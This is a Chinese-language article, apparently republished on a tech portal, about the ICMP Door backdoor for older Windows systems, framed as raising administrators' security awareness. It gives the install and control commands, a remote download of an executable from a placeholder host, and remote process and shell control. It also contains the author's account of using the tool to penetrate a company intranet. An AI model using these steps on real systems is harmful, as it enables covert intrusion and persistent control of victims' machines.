经典后门实例之C/S后门

安全 黑客攻防
C/S后门对于后门私有化起到了一定的贡献,本文主要通过列举ICMP Door这款C/S后门使广大的管理员及用户感受到C/S后门的攻击形式,有助于自身安全意识的提升。

C/S构架通常被传统的木马后门程序所使用,C/S后门的构架使得网络黑客很容易对其控制,也一定程度使得后门私有化,避免了万能密码的出现。但是关于C/S后门的概念比较模糊,其实很多的后门都可以归结为C/S后门这一类,不过其中最巧妙的,也就是我们今天所举例的ICMP Door。

ICMP Door

类型:系统后门

使用范围:win2000/xp/2003

隐蔽程度:★★★★★

使用难度:★★★☆☆

危害程度:★★★★☆

查杀难度:★★★★★

这个后门利用ICMP通道进行通信,所以不开任何端口,只是利用系统本身的ICMP包进行控制安装成系统服务后,开机自动运行,可以穿透很多防火墙——很明显可以看出它的最大特点:不开任何端口~只通过ICMP控制!和上面任何一款后门程序相比,它的控制方式是很特殊的,连80端口都不用开放,不得不佩服务程序编制都在这方面独特的思维角度和眼光!

运用举例

这个后门其实用途最广的地方在于突破网关后对内网计算机的控制,因为很多机密数据都是放在内网计算机上的,而控制内网计算机并不是我们想到位的商业网络进行入侵检测,它的网络内部并不像我们常见的内网那样非常容易入侵和控制,因为该公司本身涉及到一些网络安全的服务,所以内网个人计算机的防护是很到位的,在尝试过很多后门后,最后ICMP Door帮我实现了成功的渗透内网!由此笔者开始爱上这个后门。

首先使用icmpsrv.exe -install参数进行后门的安装,再使用icmpsend.exe IP进行控制,可以用:[http://xxx.xxx.xxx/admin.exe -hkfx.exe]方式下载文件,保存在[url=file://\\system32\]\\system32\[/url]目录下,文件名为hkfx.exe,程序名前的“-”不能省去,使用[pslist]还可以列出远程主机的进程名称和pid,再使用[pskill id]就可以杀进程了,同样,输入普通cmd命令,则远程主机也就执行了相关的命令。

这个后门是采用的c/s构架,必须要使用icmpsend才能激活服务器,但是他也有自己的先天不足:后门依靠ICMP进行通讯,现在的网络,经过冲击波的洗礼后,很少有服务器还接受ICMP包了,很多都屏蔽掉了它,所以用它来控制服务器不是一个好办法,这也是我为什么用它来控制内网计算机的原因了——内网很少有人屏蔽ICMP包吧?!
 

【编辑推荐】

  1. 浅谈后门的概念与分类
  2. 经典后门实例之网页后门
  3. 经典后门实例之线程插入后门
  4. 经典后门实例之扩展后门
  5. 用Mysql语句来生成后门木马方案

 

责任编辑:张启峰 来源: 中国IT实验室
相关推荐

2010-09-13 15:06:36

2010-09-13 14:47:58

2010-09-13 14:57:29

2010-09-13 15:26:34

2011-03-31 09:25:13

2011-03-31 08:56:32

2011-03-31 09:25:06

2011-03-31 09:25:10

2010-08-31 10:00:55

LinuxICMP

2011-11-25 15:34:33

2023-01-06 08:42:02

学习训练

2010-08-26 11:15:47

LinuxICMP后门

2013-08-09 09:50:34

2010-08-02 14:36:52

ICMPLinux

2020-11-06 00:00:00

PHP技巧后门

2013-11-08 10:08:25

2014-03-06 17:52:25

2018-01-11 09:51:34

2010-03-10 10:24:16

Linux ssh后门

2010-09-09 19:43:29

点赞
收藏

51CTO技术栈公众号